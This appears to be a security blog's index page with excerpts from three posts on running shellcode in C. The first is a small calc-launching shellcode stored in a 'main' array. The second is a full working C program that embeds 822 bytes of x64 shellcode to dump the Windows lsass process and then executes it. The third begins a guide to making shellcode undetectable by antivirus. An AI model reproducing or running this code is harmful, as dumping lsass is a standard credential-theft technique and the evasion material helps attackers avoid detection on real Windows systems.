Running Shellcode Directly in C

Here’s a cool thing I figured out in position-independent code. I would rephrase the title as running position-independent code instead of shellcode. Check my previous article Executing Shellcode Directly where I used a minimal PE and pointed the AddressofEntryPoint to the beginning of the PIC.

So the goal is to run shellcode in C without any function pointers or any functions at all, not even a main function 🙂 For example, this is all the code. I declare the variable name as “main”. I am using the Microsoft’s Visual C compiler with no parameters.

char main[] = 
"\x90\x90\x90\x90\x90\x90\x90\x90\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01"
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x43\x72\x65\x61\x75"
"\xf2\x81\x7e\x08\x6f\x63\x65\x73\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
"\xb1\xff\x53\xe2\xfd\x68\x63\x61\x6c\x63\x89\xe2\x52\x52\x53\x53"
"\x53\x53\x53\x53\x52\x53\xff\xd7";

After compiling it won’t of course run. Why? Well, the initialized data will end up in the “.data” section.


(more…)

Advertisements

Shellcode to Dump the Lsass Process

Here’s the shellcode I wrote for curiosity and ended up working nicely 🙂

This shellcode is for Windows 10 and Server 2019 x86_64.

# include <stdio.h>
# include <string.h>
# include <windows.h>
 
/*
 * Title: Shellcode to dump the lsass process
 * Works only on Windows 10 and Windows Server 2019
 * Arch: x86_64
 * Author: Osanda Malith Jayathissa (@OsandaMalith)
 * Website: https://osandamalith.com    
 * Date: 11/05/2019
 */
  
int main() {

	unsigned char shellcode[822] = {
		0xE9, 0x1B, 0x03, 0x00, 0x00, 0xCC, 0xCC, 0xCC, 0x48, 0x89, 0x5C, 0x24, 0x08, 0x48, 0x89, 0x74,
		0x24, 0x10, 0x57, 0x48, 0x83, 0xEC, 0x10, 0x65, 0x48, 0x8B, 0x04, 0x25, 0x60, 0x00, 0x00, 0x00,
		0x8B, 0xF1, 0x48, 0x8B, 0x50, 0x18, 0x4C, 0x8B, 0x4A, 0x10, 0x4D, 0x8B, 0x41, 0x30, 0x4D, 0x85,
		0xC0, 0x0F, 0x84, 0xB8, 0x00, 0x00, 0x00, 0x41, 0x0F, 0x10, 0x41, 0x58, 0x49, 0x63, 0x40, 0x3C,
		0x4D, 0x8B, 0x09, 0x42, 0x8B, 0x9C, 0x00, 0x88, 0x00, 0x00, 0x00, 0x33, 0xD2, 0xF3, 0x0F, 0x7F,
		0x04, 0x24, 0x85, 0xDB, 0x74, 0xD4, 0x48, 0x8B, 0x04, 0x24, 0x48, 0xC1, 0xE8, 0x10, 0x44, 0x0F,
		0xB7, 0xD0, 0x45, 0x85, 0xD2, 0x74, 0x20, 0x48, 0x8B, 0x4C, 0x24, 0x08, 0x45, 0x8B, 0xDA, 0xC1,
		0xCA, 0x0D, 0x80, 0x39, 0x61, 0x0F, 0xBE, 0x01, 0x7C, 0x03, 0x83, 0xC2, 0xE0, 0x03, 0xD0, 0x48,
		0xFF, 0xC1, 0x49, 0xFF, 0xCB, 0x75, 0xE8, 0x4D, 0x8D, 0x14, 0x18, 0x33, 0xC9, 0x41, 0x8B, 0x7A,
		0x20, 0x49, 0x03, 0xF8, 0x41, 0x39, 0x4A, 0x18, 0x76, 0x90, 0x8B, 0x1F, 0x45, 0x33, 0xDB, 0x48,
		0x8D, 0x7F, 0x04, 0x49, 0x03, 0xD8, 0x41, 0xC1, 0xCB, 0x0D, 0x0F, 0xBE, 0x03, 0x48, 0xFF, 0xC3,
		0x44, 0x03, 0xD8, 0x80, 0x7B, 0xFF, 0x00, 0x75, 0xED, 0x41, 0x8D, 0x04, 0x13, 0x3B, 0xC6, 0x74,
		0x0D, 0xFF, 0xC1, 0x41, 0x3B, 0x4A, 0x18, 0x72, 0xD1, 0xE9, 0x5C, 0xFF, 0xFF, 0xFF, 0x41, 0x8B,
		0x42, 0x24, 0x03, 0xC9, 0x49, 0x03, 0xC0, 0x0F, 0xB7, 0x04, 0x01, 0x41, 0x8B, 0x4A, 0x1C, 0xC1,
		0xE0, 0x02, 0x48, 0x98, 0x49, 0x03, 0xC0, 0x8B, 0x04, 0x01, 0x49, 0x03, 0xC0, 0xEB, 0x02, 0x33,
		0xC0, 0x48, 0x8B, 0x5C, 0x24, 0x20, 0x48, 0x8B, 0x74, 0x24, 0x28, 0x48, 0x83, 0xC4, 0x10, 0x5F,
		0xC3, 0xCC, 0xCC, 0xCC, 0x40, 0x55, 0x53, 0x56, 0x57, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41,
		0x57, 0x48, 0x8D, 0xAC, 0x24, 0x28, 0xFF, 0xFF, 0xFF, 0x48, 0x81, 0xEC, 0xD8, 0x01, 0x00, 0x00,
		0x33, 0xC0, 0x48, 0x8D, 0x7D, 0xA0, 0xB9, 0x30, 0x01, 0x00, 0x00, 0xF3, 0xAA, 0x45, 0x33, 0xF6,
		0xB9, 0x4C, 0x77, 0x26, 0x07, 0xC7, 0x45, 0x80, 0x6B, 0x65, 0x72, 0x6E, 0xC7, 0x45, 0x84, 0x65,
		0x6C, 0x33, 0x32, 0xC7, 0x45, 0x88, 0x2E, 0x64, 0x6C, 0x6C, 0x44, 0x88, 0x75, 0x8C, 0xC7, 0x44,
		0x24, 0x70, 0x64, 0x62, 0x67, 0x63, 0xC7, 0x44, 0x24, 0x74, 0x6F, 0x72, 0x65, 0x2E, 0xC7, 0x44,
		0x24, 0x78, 0x64, 0x6C, 0x6C, 0x00, 0xC7, 0x44, 0x24, 0x60, 0x6E, 0x74, 0x64, 0x6C, 0xC7, 0x44,
		0x24, 0x64, 0x6C, 0x2E, 0x64, 0x6C, 0x66, 0xC7, 0x44, 0x24, 0x68, 0x6C, 0x00, 0xC7, 0x44, 0x24,
		0x50, 0x6C, 0x73, 0x61, 0x73, 0xC7, 0x44, 0x24, 0x54, 0x73, 0x2E, 0x64, 0x6D, 0x66, 0xC7, 0x44,
		0x24, 0x58, 0x70, 0x00, 0xC7, 0x44, 0x24, 0x40, 0x6C, 0x73, 0x61, 0x73, 0xC7, 0x44, 0x24, 0x44,
		0x73, 0x2E, 0x65, 0x78, 0x66, 0xC7, 0x44, 0x24, 0x48, 0x65, 0x00, 0xC6, 0x85, 0x20, 0x01, 0x00,
		0x00, 0x61, 0xE8, 0x51, 0xFE, 0xFF, 0xFF, 0x48, 0x8D, 0x4D, 0x80, 0x48, 0x8B, 0xF8, 0xFF, 0xD7,
		0x48, 0x8D, 0x4C, 0x24, 0x70, 0xFF, 0xD7, 0x48, 0x8D, 0x4C, 0x24, 0x60, 0xFF, 0xD7, 0xB9, 0x80,
		0x39, 0x1E, 0x92, 0xE8, 0x30, 0xFE, 0xFF, 0xFF, 0xB9, 0xDA, 0xF6, 0xDA, 0x4F, 0x48, 0x8B, 0xF0,
		0xE8, 0x23, 0xFE, 0xFF, 0xFF, 0xB9, 0x27, 0xA9, 0xE8, 0x67, 0x48, 0x8B, 0xF8, 0xE8, 0x16, 0xFE,
		0xFF, 0xFF, 0xB9, 0x8D, 0x52, 0x01, 0xBD, 0x48, 0x8B, 0xD8, 0xE8, 0x09, 0xFE, 0xFF, 0xFF, 0xB9,
		0x74, 0x71, 0x8D, 0xDC, 0x4C, 0x8B, 0xE0, 0xE8, 0xFC, 0xFD, 0xFF, 0xFF, 0xB9, 0xB4, 0x73, 0x8D,
		0xE2, 0x4C, 0x8B, 0xF8, 0xE8, 0xEF, 0xFD, 0xFF, 0xFF, 0xB9, 0xEE, 0x95, 0xB6, 0x50, 0x4C, 0x8B,
		0xE8, 0xE8, 0xE2, 0xFD, 0xFF, 0xFF, 0xB9, 0x3D, 0xD7, 0xC8, 0x6E, 0x48, 0x89, 0x85, 0x30, 0x01,
		0x00, 0x00, 0xE8, 0xD1, 0xFD, 0xFF, 0xFF, 0xB9, 0x7A, 0x19, 0x77, 0x6A, 0x48, 0x89, 0x45, 0x90,
		0xE8, 0xC3, 0xFD, 0xFF, 0xFF, 0x4C, 0x8D, 0x8D, 0x28, 0x01, 0x00, 0x00, 0x41, 0x8D, 0x4E, 0x14,
		0x45, 0x33, 0xC0, 0xB2, 0x01, 0xFF, 0xD0, 0x4C, 0x21, 0x74, 0x24, 0x30, 0x48, 0x8D, 0x4C, 0x24,
		0x50, 0x45, 0x33, 0xC9, 0x45, 0x33, 0xC0, 0xBA, 0x00, 0x00, 0x00, 0x10, 0xC7, 0x44, 0x24, 0x28,
		0x80, 0x00, 0x00, 0x00, 0xC7, 0x44, 0x24, 0x20, 0x02, 0x00, 0x00, 0x00, 0xFF, 0xD7, 0x33, 0xD2,
		0x48, 0x89, 0x85, 0x38, 0x01, 0x00, 0x00, 0x8D, 0x4A, 0x02, 0xFF, 0xD6, 0x48, 0x8D, 0x55, 0xA0,
		0xC7, 0x45, 0xA0, 0x30, 0x01, 0x00, 0x00, 0x48, 0x8B, 0xC8, 0x48, 0x8B, 0xF8, 0xFF, 0xD3, 0x33,
		0xDB, 0x85, 0xC0, 0x74, 0x31, 0xEB, 0x1C, 0x48, 0x8D, 0x55, 0xA0, 0x48, 0x8B, 0xCF, 0x41, 0xFF,
		0xD4, 0x48, 0x8D, 0x55, 0xCC, 0x48, 0x8D, 0x8D, 0x20, 0x01, 0x00, 0x00, 0x41, 0xFF, 0xD5, 0x44,
		0x8B, 0x75, 0xA8, 0x48, 0x8D, 0x54, 0x24, 0x40, 0x48, 0x8D, 0x8D, 0x20, 0x01, 0x00, 0x00, 0x41,
		0xFF, 0xD7, 0x85, 0xC0, 0x75, 0xD1, 0x45, 0x8B, 0xC6, 0x33, 0xD2, 0xB9, 0xFF, 0xFF, 0x1F, 0x00,
		0xFF, 0x95, 0x30, 0x01, 0x00, 0x00, 0x4C, 0x8B, 0x85, 0x38, 0x01, 0x00, 0x00, 0x48, 0x89, 0x5C,
		0x24, 0x30, 0x48, 0x8B, 0xC8, 0x41, 0xB9, 0x02, 0x00, 0x00, 0x00, 0x41, 0x8B, 0xD6, 0x48, 0x89,
		0x5C, 0x24, 0x28, 0x48, 0x89, 0x5C, 0x24, 0x20, 0xFF, 0x55, 0x90, 0x48, 0x81, 0xC4, 0xD8, 0x01,
		0x00, 0x00, 0x41, 0x5F, 0x41, 0x5E, 0x41, 0x5D, 0x41, 0x5C, 0x5F, 0x5E, 0x5B, 0x5D, 0xC3, 0xCC,
		0x56, 0x48, 0x8B, 0xF4, 0x48, 0x83, 0xE4, 0xF0, 0x48, 0x83, 0xEC, 0x20, 0xE8, 0xD3, 0xFD, 0xFF,
		0xFF, 0x48, 0x8B, 0xE6, 0x5E, 0xC3
	};
    
    DWORD oldProtect;
    BOOL ret = VirtualProtect (shellcode, strlen(shellcode), PAGE_EXECUTE_READWRITE, &oldProtect);
   
    if (!ret) {
        fprintf(stderr, "%s", "Error Occured");
        return EXIT_FAILURE;
    }
   
    ((void(*)(void))shellcode)();
  
    VirtualProtect (shellcode, strlen(shellcode), oldProtect, &oldProtect);
   
    return EXIT_SUCCESS;
}

(more…)

Making your Shellcode Undetectable using .NET

In the world of Windows you can execute shellcode using the VirtualAlloc and VirtualProtect Windows APIs. There are also few more APIs we can use to do the same task but different techniques involved.

VirtualProtect

This is how MSDN explains this:

Changes the protection on a region of committed pages in the virtual address space of the calling process.

BOOL WINAPI VirtualProtect(
_In_ LPVOID lpAddress,
_In_ SIZE_T dwSize,
_In_ DWORD flNewProtect,
_Out_ PDWORD lpflOldProtect
);

https://msdn.microsoft.com/en-us/library/windows/desktop/aa366898(v=vs.85).aspx

Basically we can make our shellcode memory region executable and invoke it using this API. We use the PAGE_EXECUTE_READWRITE as the memory protection constant for the flNewProtect parameter to make our page RWX.

Here’s an example using C which I have implemented.
(more…)